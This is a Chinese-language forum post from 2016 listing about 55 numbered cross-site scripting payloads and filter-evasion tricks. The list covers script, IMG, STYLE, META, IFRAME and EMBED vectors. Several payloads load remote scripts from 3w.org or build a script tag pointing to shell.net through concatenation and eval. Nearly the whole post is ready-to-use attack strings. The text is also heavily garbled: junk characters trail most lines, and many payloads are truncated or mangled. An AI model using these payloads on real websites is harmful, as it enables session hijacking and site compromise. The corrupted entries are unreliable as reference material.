(1)普通的XSS JavaScript注入' w: Y9 l+ J& K! s" J
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>4 l$ ]: n7 u, X6 i
(99)另类弹框. ?2 x* H" p7 [
<q/oncut=alert()>1
7 B0 u' y9 e+ R<s/onclick=alert()>b0 s: |/ j) H& }9 O8 K0 K
<XSS=" onclick="alert(1)//">clickme</SSX=">* I+ R" U! ]5 k4 i/ G" U
<zzz onclick=alert`1`>clickme</zzz> $ l+ L6 e ?" G
<a onclick=alert`1`>clickme</a>: Q) G: r |% ^7 I
<a=">clickme</a=">
- {- p6 J4 h# y, h3 p4 e<a=">clickme</a>2 ^ k9 i/ }, }2 V0 H
<z=">clickme</z=">% J- C; o" t' Z, d
<z onclick=alert`1`>clickme</z>
/ y; A- d8 D: a! V# W" T8 ^* W/ a* p ]+ `( f" i- x
(2)IMG标签XSS使用JavaScript命令' |' Q- O( a- v5 m
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
1 {" D4 o3 e& c0 Z( u1 m y+ U* e# y" y
(3)IMG标签无分号无引号
9 w( j) [8 a+ w$ l<IMG SRC=javascript:alert(‘XSS’)>; R4 {$ J; X0 ~) b" X
; E; Z& C0 S+ u: ?7 E+ i
(4)IMG标签大小写不敏感+ r# M" y% q4 `1 M2 a
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>. s7 I0 f% [% Q' q$ r. J
) f0 C1 V. I) @/ o" V) e(5)HTML编码(必须有分号)- @- O3 E( `' s! W2 k X2 ]4 ^
<IMG SRC=javascript:alert(“XSS”)>
- B2 X4 Q' [3 P) K
& M, [2 d/ }! H(6)修正缺陷IMG标签
& ^1 ~& q% v0 X" x; ^% a5 S' `7 b<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>- M$ r; D0 `; J
: D% E4 C# C2 q2 E2 D" v
(7)formCharCode标签(计算器)
& F' `" y* s+ T* z9 K1 _$ O, F<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
! Q0 O/ I# U/ o, S) F; k8 F' @& b8 T% } \
(8)UTF-8的Unicode编码(计算器)
+ i1 e0 B% G; e<IMG SRC=jav..省略..S')>, I1 J) E# R! A+ h
0 {8 d" ^+ n$ @4 q
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)# T/ g' M& H1 J
<IMG SRC=jav..省略..S')>" O A, u! e g; o, \2 D
0 @. U9 t2 n3 \. T7 ]5 }; Q# B
(10)十六进制编码也是没有分号(计算器)
! D# n4 E" X& {6 A<IMG SRC=\'#\'" /span>! I% b8 R/ z( M# ~
. W, L+ _# v5 m) G, c$ ~(11)嵌入式标签,将Javascript分开7 k' L1 N D+ d. l; i/ `3 V( J
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
I1 v# l* z, u5 D% e8 j, O- Z7 g. F q4 M. A$ F. s$ N
(12)嵌入式编码标签,将Javascript分开
5 Z! B- k: l3 p7 I+ J: g* t<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
3 P2 t0 G1 n% ~
! I$ h7 B+ B" p) |( j# v1 Q(13)嵌入式换行符! W) d! U2 p; P9 D
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>7 Q; l* C$ x/ A2 _7 s" w+ V" ?7 q
7 S1 E+ _5 h& H% I- r
(14)嵌入式回车* O% W0 i% e0 U* n9 i
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>, M, M& a7 d+ I9 \
3 m( O& c6 M8 P. q
(15)嵌入式多行注入JavaScript,这是XSS极端的例子 n$ E4 r( B; M( Z( I
<IMG SRC=\'#\'" /span>
& A: Q. E0 H0 ^" H X
- e% y8 t' K4 l+ N% i3 Z(16)解决限制字符(要求同页面)
6 ~! G/ f. s5 c' A- ?/ u4 c& i<script>z=’document.’</script>; k3 j3 G6 L$ e9 S3 u
<script>z=z+’write(“‘</script>
2 H5 P. O l4 x, K0 @<script>z=z+’<script’</script>
- Y8 `: z, {0 U L<script>z=z+’ src=ht’</script>
9 _: T- Y W% l0 Q+ y<script>z=z+’tp://ww’</script>
/ X! c( o2 `$ n' N# V$ s. Z3 G' D: ]<script>z=z+’w.shell’</script>$ W6 v" i7 W/ P
<script>z=z+’.net/1.’</script>
0 t4 o5 A3 D7 e I! t<script>z=z+’js></sc’</script>. g$ b9 L. v2 l4 g+ R) ?. ]# }
<script>z=z+’ript>”)’</script>6 m, @4 M" M: x- J3 N
<script>eval_r(z)</script>2 ]7 W* X4 A1 t8 a& a' K2 ?
3 G. p, E5 Z7 \
(17)空字符
* B5 z/ r0 b. Y" ~# jperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
" L/ V: e8 O7 q, W- c
3 b8 _* j5 L: P* Y; y(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
0 V- N$ J+ ^+ H& a* M* Qperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
2 G3 Z( ?; Y, o3 D
) V; y) y( L- N' y) Z$ ]3 Z5 v(19)Spaces和meta前的IMG标签: g* T1 O4 J0 |7 f. Q. c; h
<IMG SRC=\'#\'" � javascript:alert(‘XSS’);”>
) L/ Q, g, h* Q2 v4 O. I4 p4 _3 c. P+ g3 j
(20)Non-alpha-non-digit XSS
8 J( M" n* V& T" k) q<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>) H. T" r( q6 v
/ e) l& v. p: U( y3 z
(21)Non-alpha-non-digit XSS to 2# a. z n: x* T e% u' ~5 O
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
- U& Z5 l( t8 e2 [# }
3 f+ B" C, `$ G! c(22)Non-alpha-non-digit XSS to 3- f) Y; n P# {' ^5 B
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>* ~ I& y( j; G$ s7 s! j0 J1 g
* P; C$ }+ c$ Y v
(23)双开括号
; A" A# D+ s) p- \<<SCRIPT>alert(“XSS”);//<</SCRIPT>
4 k4 ]5 V0 v; q) M; E8 m( D9 u0 H' N( {$ A! I4 [/ N: s
(24)无结束脚本标记(仅火狐等浏览器)
" o" o8 ~" M) N# a6 S<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
9 B: E9 ^3 c6 j/ g
5 S' r9 C, o1 g: G/ \6 z; q+ N# M(25)无结束脚本标记2
9 G: v' e9 J; W* W& ]9 u# J<SCRIPT SRC=//3w.org/XSS/xss.js>, K5 k9 J+ I4 S$ b) [/ H' a& g
4 q% Z" G! C" n- g(26)半开的HTML/JavaScript XSS; S3 v6 D6 v0 \& q% x8 z& M
<IMG SRC=\'#\'" /span>
% c* e x) s8 X$ Q9 h. `0 J
, x ?6 z* K9 G0 O0 z- s% k(27)双开角括号* y8 @. y# O& t4 c9 P. Z
<iframe src=http://3w.org/XSS.html <1 x" z/ ~/ M7 U" c
2 |4 Y% Z) U9 s2 H(28)无单引号 双引号 分号
2 o T0 l$ t0 v2 @% q3 V+ T0 W* y<SCRIPT>a=/XSS/
) B3 m8 [0 ^: L$ k' P8 Ralert(a.source)</SCRIPT>2 Y3 T _1 m' W. J0 H/ a' W
, W; e: z' B+ S# J2 Y( g+ [
(29)换码过滤的JavaScript4 s/ p9 E0 ^& N H: f6 |% A
\”;alert(‘XSS’);//+ ? o7 T6 a+ ^' l( O+ _6 V
7 R& d0 C: S6 B. {' r. \- L$ {(30)结束Title标签* I3 k- @! ]/ R; z" Z4 l) \5 p: J( q6 x
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>. q; J, G2 i2 k* e5 r
- Z' d+ z& z7 x5 u- [% I! Z(31)Input Image
7 x" B, p; P0 X& C<INPUT SRC=\'#\'" /span># n. ?7 X1 d- Z6 M* G: r
7 Y2 j$ z3 ]4 _' f% R, A: ?& _
(32)BODY Image2 x6 {( M9 |( s
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
5 G" V. v) b+ n c! k9 U: x4 X) J
1 v5 ~5 E6 i" @3 }" J/ o# ^(33)BODY标签
* {2 A* ]* g. c$ q5 _- e4 Z/ l<BODY(‘XSS’)>& z% I% J; a2 y" }8 \4 e
' K% s9 q3 n" W(34)IMG Dynsrc9 y% K) b) G; t% q2 ^2 F
<IMG DYNSRC=\'#\'" /span>9 l" q+ f1 r( H1 S! H0 I
2 P* ]* t4 C% D7 W(35)IMG Lowsrc
6 `5 {! q) _9 g& H! E C' _- C<IMG LOWSRC=\'#\'" /span>
8 |2 S! ^5 h0 i7 q9 ]7 T3 z; }0 G4 f! c# _ Q- c8 c
(36)BGSOUND6 T8 H6 @. U! C. d
<BGSOUND SRC=\'#\'" /span>
) H8 R7 z c1 V$ {, d* u
9 V7 D/ c4 i u8 \ }(37)STYLE sheet
5 _) R- N; ?0 ?0 R" J6 H# Z3 e<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>! D/ q) {& O. r# B2 \" l8 G
! J6 A0 C4 }1 H& }5 b
(38)远程样式表
3 r4 H3 |& J' H+ ?! D<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>0 b- P# h. T3 e5 R1 X. |/ \
& V0 c( p$ ]5 d! C, ^(39)List-style-image(列表式)' N/ M0 [3 ~; O
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
i$ L$ X6 B# e/ ]
: d, X" v9 ]1 {, U(40)IMG VBscript
7 z8 }1 x/ U! {. r6 S<IMG SRC=\'#\'" /STYLE><UL><LI>XSS
- q7 U0 @, {2 x' u9 a6 g- q. z
6 @2 o1 L4 _9 f3 F, C7 k/ X(41)META链接url2 {, S) `1 x- B, {
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>6 k5 E6 N5 x# F1 z5 U5 L8 U5 U
$ f% ~2 U: d# Q, F) z
(42)Iframe% f5 B6 ]8 ^" |
<IFRAME SRC=\'#\'" /IFRAME>6 }" I: j1 v8 d# N. ~
& B; z& O3 {+ D( H0 v5 j0 @8 h(43)Frame; f$ n% R# n9 {2 L' U' T5 \2 J* t
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>
" z: @+ Q4 C/ Q' Q1 ^
4 K7 @; u2 B0 K: I' W(44)Table9 P1 ^6 o) @3 L5 O7 M
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
4 S# o& Z p' n: D: Z ~3 |5 N5 c5 P0 [1 A0 F
(45)TD& X) A; S9 [8 v! G& ~& H$ s
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>1 q+ ^) ]* O$ X, e: J6 s
. Z# s9 o' C9 T% J4 e; m3 b3 l2 I6 E, i
(46)DIV background-image; L, @7 } G, j" H0 o9 H0 t5 W* v9 K4 k
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
& w. t& J* Z" F) V! t2 W8 h( ]/ ?: R2 T/ A
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)6 B/ \: \$ W' w$ i/ m5 ?
<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>
6 L/ Y( Q }! d7 h |/ _! l3 b
6 U4 J2 r9 j! t(48)DIV expression- M, u6 \0 r) d9 M" c, f8 w4 X, d
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>- W" i7 B6 b& [& J
+ V7 w- C) ^+ g# j( {6 U
(49)STYLE属性分拆表达- E% W+ d; l* e3 a$ @6 A3 _6 p6 ?
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>- b' M& B) a ~/ L
0 k( k6 L/ z, e
(50)匿名STYLE(组成:开角号和一个字母开头)6 w4 d+ j8 N8 v4 t8 W" q3 f
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
1 M& O" v2 |; }2 N( \# C9 {+ F9 A+ A
(51)STYLE background-image
0 I! ~0 Z1 `: |# D5 _6 h( Z<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>( U7 ?0 d+ x# Y
6 A$ x3 v4 N/ |4 |1 [
(52)IMG STYLE方式
$ O0 r+ j( d8 Xexppression(alert(“XSS”))’>
) u% P9 c$ [$ @* ?9 b; m) Z Y# R7 o/ S2 e% a8 c1 P
(53)STYLE background8 f4 ]- O$ Y5 D5 o
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
" L8 P; A) ^& v' g" t: A5 q& X# C2 {, k6 }2 W
(54)BASE
, W( X4 N0 q7 |, N<BASE HREF=”javascript:alert(‘XSS’);//”>: t. d8 i h( i$ n4 k7 n
: d& i! n2 u2 h% h
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS% m L1 W5 S+ s" ?/ T o" h
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>
$ k5 O( o1 `' b6 T- V7 ], e* `* G |
发表于 2016-4-28 10:06:15
收藏
支持
反对